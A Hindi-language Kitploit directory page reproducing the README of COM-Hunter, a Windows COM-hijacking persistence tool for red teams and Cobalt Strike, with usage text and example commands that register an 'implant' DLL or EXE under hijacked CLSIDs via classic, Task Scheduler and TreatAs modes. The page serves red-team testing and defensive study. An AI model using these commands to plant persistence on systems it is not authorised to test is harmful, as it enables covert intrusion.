Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/nickvourd/com-hunter
विशेषाधिकार वृद्धिस्थायित्व तंत्रपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubnickvourd/com-hunter

COM-Hunter

रिपॉजिटरी देखें
3886124 दिन पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

Windows COM hijacking persistence tool with search, classic, Task Scheduler, and TreatAs modes. Available as .NET executable and Cobalt Strike BOF for red team operations. विंडोज COM अपहरण स्थायित्व उपकरण जिसमें खोज, क्लासिक, टास्क शेड्यूलर और TreatAs मोड शामिल हैं। .NET निष्पादन योग्य और रेड टीम संचालन के लिए Cobalt Strike BOF के रूप में उपलब्ध।

साझा करें

COM-Hunter

COM अपहरण VOODOO



गिटहब लाइसेंस गिटहब रेपो स्टार्स
गिटहब फोर्क्स गिटहब वॉचर्स गिटहब योगदानकर्ता

विवरण

COM-Hunter एक COM अपहरण स्थिरता (persistence) उपकरण है।

यह .NET संस्करण और Cobalt Strike के साथ पूर्णतः संगत BOF वेरिएंट दोनों में उपलब्ध है।

Static Badge Static Badge Static Badge

निम्नलिखित सूची उपलब्ध मोडों की व्याख्या करती है:

  • खोज मोड: LocalServer32, InprocServer32 और HKLM व HKCU दोनों के अंतर्गत रजिस्ट्री प्रविष्टियों के आधार पर CLSID खोजता है।
  • क्लासिक स्थिरता मोड: LocalServer32 या InprocServer32 का उपयोग करके क्लासिक COM अपहरण स्थिरता करता है।
  • कार्य अनुसूचक मोड: कार्य अनुसूचक के माध्यम से LocalServer32 या InprocServer32 का उपयोग करके स्वचालित रूप से COM अपहरण स्थिरता स्थापित करता है।
  • TreatAs मोड: TreatAs रजिस्ट्री कुंजी और एक नकली (अग्रेषण योग्य) CLSID के माध्यम से LocalServer32 या InprocServer32 का उपयोग करके COM अपहरण स्थिरता करता है।
  • हटाएं मोड: HKLM और HKCU दोनों के अंतर्गत LocalServer32, और संबंधित रजिस्ट्री प्रविष्टियों पर निर्भर स्थिरता तंत्रों को हटाता है।

ℹ️ इस उपकरण का चयन किया गया है और यह गर्व से Cobalt Strike Community Kit का हिस्सा है।

यदि आपको कोई बग मिलता है, तो कृपया उन्हें रिपोर्ट करने में संकोच न करें। आपकी प्रतिक्रिया इस परियोजना की गुणवत्ता सुधारने में मूल्यवान है!

अस्वीकरण

इस परियोजना के लेखक और योगदानकर्ता उपकरण के किसी भी अवैध उपयोग के लिए उत्तरदायी नहीं हैं। यह केवल शैक्षिक उद्देश्यों के लिए है। उपयोगकर्ता कानूनी उपयोग सुनिश्चित करने के लिए जिम्मेदार हैं।

विषय-सूची

  • COM-Hunter
    • विवरण
    • अस्वीकरण
    • विषय-सूची
    • स्वीकृति
    • उपयोग
    • .NET उदाहरण
    • BOF कार्यान्वयन
    • संदर्भ

स्वीकृति

यह परियोजना ❤️ से @nickvourd और @S1ckB0y1337 द्वारा बनाई गई है।

मेरे मित्र Marios Gyftos का विशेष धन्यवाद, जिन्होंने इस उपकरण के बीटा परीक्षण चरण के दौरान अमूल्य सहायता प्रदान की।

@zeropointsecltd के RTO पाठ्यक्रम से प्रेरित।

BOF कार्यान्वयन Lefteris Panos और उनकी शानदार परियोजना RegPersist से प्रेरित है।

base.c और bofdefs.h फ़ाइलें TrustedSec के CS-Situational-Awareness-BOF परियोजना से सीधी प्रतियाँ हैं।

उपयोग

root@kitploit:~
 ██████╗ ██████╗ ███╗   ███╗      ██╗  ██╗██╗   ██╗███╗   ██╗████████╗███████╗██████╗
██╔════╝██╔═══██╗████╗ ████║      ██║  ██║██║   ██║████╗  ██║╚══██╔══╝██╔════╝██╔══██╗
██║     ██║   ██║██╔████╔██║█████╗███████║██║   ██║██╔██╗ ██║   ██║   █████╗  ██████╔╝
██║     ██║   ██║██║╚██╔╝██║╚════╝██╔══██║██║   ██║██║╚██╗██║   ██║   ██╔══╝  ██╔══██╗
╚██████╗╚██████╔╝██║ ╚═╝ ██║      ██║  ██║╚██████╔╝██║ ╚████║   ██║   ███████╗██║  ██║
 ╚═════╝ ╚═════╝ ╚═╝     ╚═╝      ╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═══╝   ╚═╝   ╚══════╝╚═╝  ╚═╝

                                   Version: 3.0
                             @nickvourd && @S1ckB0y1337
                  ~ Inspired during the RTO course by @zeropointsecltd ~

Usage: COM_Hunter.exe <mode> <options>

[+] Available Modes:
    search             Search Mode
    persist            Classic Persist Mode
    tasksch            Task Scheduler Mode
    treatas            TreatAs Mode
    remove             Remove Mode

[+] Search Mode:
Usage:  COM-Hunter.exe search <CLSID> <options>
    -a, --all                   Search DLL and EXE implementations in HKLM and HKCU
    -i, --inprocserver32        Search DLL implementations in HKLM and HKCU
    -l, --localserver32         Search EXE implementations in HKLM and HKCU
    -m, --machine               Search DLL and EXE implementations in HKLM
    -u, --user                  Search DLL and EXE implementations in HKCU

[+] Classic Persist Mode:
Usage:  COM-Hunter.exe persist <CLSID> <binary_path> <option>
    -i, --inprocserver32        Set DLL implementation
    -l, --localserver32         Set EXE implementation

[+] Task Scheduler Mode:
Usage:  COM-Hunter.exe tasksch <binary_path> <option>
    -i, --inprocserver32        Set DLL implementation
    -l, --localserver32         Set EXE implementation

[+] TreatAs Mode:
Usage:  COM-Hunter.exe treatas <CLSID> <fake_CLSID> <binary_path> <option>
    -i, --inprocserver32        Set DLL implementation
    -l, --localserver32         Set EXE implementation

[+] Remove Mode:
Usage:  COM-Hunter.exe remove <CLSID> <options>
    -a, --all                   Remove DLL and EXE implementations in HKLM and HKCU
    -i, --inprocserver32        Remove DLL implementations in HKLM and HKCU
    -l, --localserver32         Remove EXE implementations in HKLM and HKCU
    -m, --machine               Remove DLL and EXE implementations in HKLM
    -u, --user                  Remove DLL and EXE implementations in HKCU

.NET उदाहरण

ℹ️ HKLM और HKCU में DLL और EXE कार्यान्वयन खोजें:

root@kitploit:~
.\COM-Hunter.exe search 01575CFE-9A55-4003-A5E1-F38D1EBDCBE1 -a

ℹ️ HKLM और HKCU में EXE कार्यान्वयन खोजें:

root@kitploit:~
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l

ℹ️ HKLM में उन्नत EXE कार्यान्वयन खोजें:

root@kitploit:~
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l --machine

ℹ️ HKCU में EXE और DLL कार्यान्वयन खोजें:

root@kitploit:~
.\COM-Hunter.exe search AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 --user

ℹ️ DLL कार्यान्वयन का उपयोग करके क्लासिक स्थिरता करें:

root@kitploit:~
.\COM-Hunter.exe persist AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 C:\Users\victim\Desktop\implant.dll -i

ℹ️ EXE कार्यान्वयन का उपयोग करके क्लासिक स्थिरता करें:

root@kitploit:~
.\COM-Hunter.exe persist "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" C:\Users\victim\Desktop\implant.exe --localserver32

ℹ️ DLL कार्यान्वयन का उपयोग करके कार्य अनुसूचक के माध्यम से स्थिरता करें:

root@kitploit:~
.\COM-Hunter.exe tasksch C:\Users\victim\Desktop\implant.dll --inprocserver32

ℹ️ TreatAs रजिस्ट्री कुंजी और नकली (अग्रेषण योग्य) CLSID का उपयोग करके DLL कार्यान्वयन के माध्यम से स्थिरता करें:

root@kitploit:~
.\COM-Hunter.exe treatas AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 "{00000012-1312-1997-2605-F38D1EBDCBE1}" C:\Users\victim\Desktop\implant.dll -i

ℹ️ HKCU में DLL कार्यान्वयन स्थिरता हटाएं:

root@kitploit:~
.\COM-Hunter.exe remove AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 -i -u

BOF कार्यान्वयन

ℹ️ आवश्यक MinGW-w64 टूलचेन (x86_64-w64-mingw32-gcc और i686-w64-mingw32-gcc)

ℹ️ दोनों आर्किटेक्चर के लिए BOF ऑब्जेक्ट संकलित करें:

root@kitploit:~
./make_all.sh

यह निम्नलिखित करेगा:

  1. com_hunter_* निर्देशिकाएँ बनाएगा।
  2. com_hunter_*.x64.o और com_hunter_*.x86.o संकलित करेगा।
  3. दोनों ऑब्जेक्ट फ़ाइलों को com_hunter_*/ निर्देशिकाओं में ले जाएगा।

ℹ️ BOF मॉड्यूल संकलित करने के बाद, Cobalt Strike में com_hunter_bof.cna लोड करें।

ℹ️ निर्माण आर्टिफैक्ट्स को साफ करने के लिए, प्रत्येक src निर्देशिका में जाएं और निष्पादित करें:

root@kitploit:~
make clean

संदर्भ

  • Persistence: “the continued or prolonged existence of something”: Part 2 – COM Hijacking by MDSec
  • Abusing the COM Registry Structure (Part 2): Hijacking & Loading Techniques by BOHOPS
  • Userland Persistence with Scheduled Tasks and COM Handler Hijacking by Enigma0x3
  • COM Objects Hijacking by Virus Total
  • CS-Remote-OPs-BOF GitHub Repository by TrustedSec
  • A Developer's Introduction to Beacon Object Files by TrustedSec
  • BOF Development & Tradecraft Course by Zeropoint Security
टूल डाउनलोड करें
InprocServer32